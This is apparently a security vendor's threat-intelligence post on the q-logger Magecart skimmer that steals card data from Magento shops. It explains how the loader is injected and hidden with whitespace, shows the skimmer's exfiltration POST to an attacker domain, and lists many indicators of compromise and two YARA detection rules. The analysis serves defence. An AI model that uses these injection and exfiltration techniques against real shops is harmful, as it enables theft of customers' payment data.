q-logger skimmer keeps Magecart attacks going

This blog post was authored by Jérôme Segura

Although global e-commerce is continuing to grow rapidly, it seems as though Magecart attacks via digital skimmers have not followed the same trend. This is certainly true if we only look at recent newsworthy attacks; indeed when a victim is a large business or popular brand we typically are more likely to remember it.

From a research standpoint, we have observed certain shifts in the scope of attacks. For instance, the different threat actors are continuing to expand and diversify their methods and infrastructure. In a blog post about Magecart Group 8, we documented some of the various web properties used to serve skimmers and exfiltrate stolen data.

But at the end of the day, we only know about attacks that we can see, that is until we discover more. Case in point, one particular skimmer identified as q-logger, has been active for several months. But it wasn’t until we started digging further that we realized how much bigger it was.

Q-logger origins

This skimmer was originally flagged by Eric Brandel as q-logger. Depending on how much you enjoy parsing JavaScript you may have a love/hate relationship with it. The code is dense and using an obfuscator that is as generic as can be, making identification using signatures challenging.

Thanks to some data from @sansecio I’ve come across a new(?) digital skimmer/#magecart I call “q-logger”. It has a variety of features, the most peculiar may be the secondary keylogger it uses to try and defend against inspection. 1/16 pic.twitter.com/ME80KMrNg5

— Eric Brandel (@AffableKraut) April 22, 2021

This skimmer can be found loaded directly into compromised e-commerce sites. However, in the majority of cases we found it loaded externally.

The loader

The loader is also an encoded piece of JavaScript that is somewhat obscure. It is injected inline within the DOM right before the text/x-magento-init tag or separated by copious amounts of white space.

One way to understand what the code does is by using a debugger and setting a breakpoint at a particular spot. It is best to either use an already compromised site or bypass the check for the address bar (onestepcheckout).

We can now see the purpose of this script: it is to load the proper skimmer.

The skimmer

As mentioned previously, the skimmer is quite opaque and makes debugging effort difficult and lengthy.

To cut to the chase, the skimmer exfiltrates data via a POST request to the same domain name where the JavaScript is loaded from.

POST https://filltobill5.casa/ HTTP/1.1
Host: filltobill5.casa
[obfuscated data]

Threat actor and victims

We were able to collect a few indicators from the threat actor behind this campaign. One was the use of netmail.tk, also observed by Luke Leal, for registering skimmer domains.

Although there are clusters of domains from the same registrant, we see that they are trying to compartmentalize their infrastructure and hide the hosting provider’s true IP address. They also register domains en masse, which allows them to defeat traditional blocklists.

We don’t have a good estimate of how prevalent this campaign is, but we certainly run into it regularly while monitoring e-commerce sites for malicious code. The victims are various small businesses with an online shop running Magento.

Conclusion

The large number of e-commerce sites that are running outdated versions of their CMS is a low hanging fruit for threat actors interested in stealing credit card data. In a sense, there is always a baseline of potential victims that can be harvested.

And every now and again, some opportunities appear. They could be as simple as a zero-day in a plugin or CMS, or maybe an entry point into more valuable targets via a supply-chain attack.

Threat actors are always ready to pounce on those and may well have established their infrastructure ahead of time, waiting for such opportunities.

Malwarebytes customers are protected against this skimmer.

Indicators of Compromise

Email addresses (registrant)

wxugvvvu@netmail[.]tk
isgskpys@netmail[.]tk
zulhqmnr@netmail[.]tk
yzzljjkmc@emlhub[.]com
foyiy11183@macosnine[.]com

Skimmer domains

adminet[.]site
adminet[.]space
amasterweb[.]site
analistcloud[.]space
analistnet[.]site
analistnet[.]space
analistsite[.]site
analistsite[.]space
analisttab[.]site
analisttab[.]space
analistweb[.]site
analistweb[.]space
analitic-tab[.]site
analitic-tab[.]space
analiticnet[.]site
analitics-tab[.]site
analiticsnet[.]site
analiticstab[.]site
analiticstab[.]space
analitictab[.]site
analitictab[.]space
analiticweb[.]site
analizeport[.]site
analizerete[.]site
analylicweb[.]site
analystclick[.]site
analysttraffic[.]site
analystview[.]site
analystweb[.]site
analyticlick[.]site
analyticmanager[.]site
analyticview[.]site
aneweb[.]site
bublegum[.]xyz
cdnetworker[.]site
cleanerjs[.]site
clickanalyst[.]site
clickanalytic[.]site
cloudtester[.]site
cocolatest[.]sbs
commenter[.]site
connectweb[.]space
domainclean[.]site
domainet[.]site
domainet[.]space
fastester[.]site
fastjspage[.]site
fastupload[.]site
filltobill5[.]casa
foosq[.]one
foundanalyst[.]site
foundanalytic[.]site
fullka[.]online
goos1[.]store
gudini[.]cam
hardtester[.]site
hostcontrol[.]space
httpanel[.]site
indokitel[.]xyz
interage[.]site
ipcounter[.]space
itoltuico[.]cyou

itsector[.]date
jscleaner[.]site
lanetester[.]site
lanlocker[.]site
linkerange[.]site
linkerange[.]space
listmanager[.]space
loockerweb[.]site
magengine[.]site
managerage[.]site
managerage[.]space
managertraffic[.]site
mariaschool[.]xyz
masterlinker[.]site
masternet[.]space
masterport[.]site
mediaconservative[.]xyz
minanalize[.]site
minimazerjs[.]site
netanalist[.]site
netanalist[.]space
netanalisttest[.]space
netanalitic[.]site
netanalitic[.]space
netanalitics[.]site
netcontrol[.]site
netpanel[.]site
netstart[.]space
nettingpanel[.]site
nettingtest[.]site
nettraffic[.]site
ollaholla[.]cyou
onehitech[.]casa
ownerpage[.]site
pagecleaner[.]site
pagegine[.]site
pageloader[.]site
pagenator[.]site
pagestater[.]site
pagesupport[.]site
panelake[.]site
panelake[.]space
panelan[.]site
panelblock[.]site
panelnetting[.]site
panelocker[.]site
pinokio[.]online
planetspeed[.]site
producteditor[.]site
retenetweb[.]site
rokki[.]club
saverplanel[.]site
sectimer[.]site
securefield[.]site
seeweb[.]space
sentech[.]cyou
showproduct[.]site
siteanalist[.]site
siteanalist[.]space
siteanalitic[.]site
siteanalitics[.]site
siteanalyst[.]site

siteanalytic[.]site
sitengine[.]site
sitesecure[.]space
sitetraffic[.]site
slickclean[.]site
slotmanager[.]site
slotshower[.]site
smallka[.]cam
smalltrch[.]cc
soorkis[.]one
spaceclean[.]site
spacecom[.]site
speedstress[.]site
speedtester[.]site
speedtester[.]space
sslmanager[.]site
starnetting[.]site
statetraffic[.]site
statsclick[.]site
storepanel[.]site
suporter[.]site
tab-analitic[.]site
tab-analitic[.]space
tab-analitics[.]site
tab-analitics[.]space
tabanalist[.]site
tabanalist[.]space
tabanalitic[.]site
tabanalitic[.]space
tabanalitics[.]site
tabanalitics[.]space
targetag[.]space
telanet[.]site
telanet[.]space
trafficanalyst[.]site
trafficanalytics[.]site
trafficcloud[.]site
trafficsanalist[.]site
trafficsee[.]site
trafficweb[.]site
truetech[.]cam
unpkgtraffic[.]site
veeneetech[.]world
versionhtml[.]site
viewanalyst[.]site
viewanalytic[.]site
webanalist[.]site
webanalist[.]space
webanalitic[.]site
webanalitics[.]site
webanalylic[.]site
webanalyst[.]site
webmode[.]site
webmoder[.]space
welltech[.]bar
welltech[.]monster
welltech[.]rest

Skimmer URLs

filltobill5[.]casa/state-3.9.min.js
welltech[.]bar/state-5.0.7.js
veeneetech[.]world/tag-2.7.js
goos1[.]store/openapi-3.3.min.js
goos1[.]store/animate-1.6.9.min.js
mariaschool[.]xyz/openapi.min.js
pagecleaner[.]site/state.min.js
foosq[.]one/mobile.js
pinokio[.]online/slick-3.4.min.js
truetech[.]cam/screen-4.6.min.js
onehitech[.]casa/tags-3.0.7.js
rokki[.]club/mobile-1.3.min.js
bublegum[.]xyz/libs.min.js
fastjspage[.]site/utils.js
fastester[.]site/waypoints.min.js
versionhtml[.]site/openapi-4.1.js
itoltuico[.]cyou/library-3.6.js

adminet[.]site/utils.js
ollaholla[.]cyou/common-4.1.js
indokitel[.]xyz/current.min.js
panelake[.]site/tag.js
gudini[.]cam/libs-2.0.js
fullka[.]online/dropdowns-1.6.min.js
welltech[.]monster/mobile-2.3.min.js
welltech[.]rest/widget.min.js
sentech[.]cyou/widget.min.js
smalltrch[.]cc/plugin-1.9.7.js
soorkis[.]one/widget-3.6.7.js
analistcloud[.]space/common.js
smallka[.]cam/plugin-1.1.3.js
loockerweb[.]site/common.js
mediaconservative[.]xyz/script.js
itsector[.]date/waypoints.min.js

YARA rules

rule qlogger_loader_WebSkimmer : Magecart WebSkimmer
{
    meta:
        author = "Malwarebytes"
        description = "Magecart (q-logger loader)"       source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/"
        date = "2021-10-19"   strings:
        $regex = /"load",function\(\)\{\(function\(\)\{/
        $regex2 = /while\(!!\[\]\)\{try{var/
        $regex3 = /\(\w\['shift'\]\(\)\);\}\}\}/   condition:
        all of them
} rule qlogger_skimmer_WebSkimmer : Magecart WebSkimmer
{ meta: author = "Malwarebytes" description = "Magecart (q-logger skimmer)" source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/" date = "2021-10-19" strings: $regex = /return\(!!window\[\w{2}\(/ $regex2 = /\w\(\)&&console\[/ condition: all of them
}